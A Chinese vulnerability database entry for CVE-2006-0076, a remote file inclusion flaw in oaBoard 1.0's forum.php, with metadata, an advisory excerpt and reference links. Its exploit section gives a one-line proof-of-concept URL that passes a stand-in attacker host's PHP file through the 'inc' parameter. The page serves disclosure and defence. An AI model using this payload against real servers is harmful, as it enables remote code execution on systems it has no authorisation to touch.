OABoard Forum脚本远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109572 漏洞类型 输入验证
发布时间 2005-12-29 更新时间 2006-09-21
CVE编号 CVE-2006-0076 CNNVD-ID CNNVD-200601-012
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/26998
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-012
|漏洞详情
oaBoard1.0的forum.php中存在PHP远程文件包含漏洞,远程攻击者可以通过inc参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/16105/info

The oaBoard application is prone to a remote file-include vulnerability. As a result, remote users may specify external PHP scripts to be included by the application.

This could result in the execution of arbitrary PHP code in the context of the webserver hosting the application. 

http://oaboard.example.com/oaboard_en/forum.php?inc=http://attacker.example.com/code.php
|参考资料

来源:BID
名称:16105
链接:http://www.securityfocus.com/bid/16105
来源:BUGTRAQ
名称:20060531Re:OaBoard1.0RemoteFileinclusion
链接:http://www.securityfocus.com/archive/1/archive/1/435859/100/0/threaded
来源:BUGTRAQ
名称:20060530OaBoard1.0RemoteFileinclusion
链接:http://www.securityfocus.com/archive/1/archive/1/435371/100/0/threaded
来源:BUGTRAQ
名称:20060101[eVuln]oaBoardPHPCodeExecution
链接:http://www.securityfocus.com/archive/1/archive/1/420676/100/0/threaded
来源:SECTRACK
名称:1016211
链接:http://securitytracker.com/id?1016211
来源:MISC
链接:http://evuln.com/vulns/3/summary.html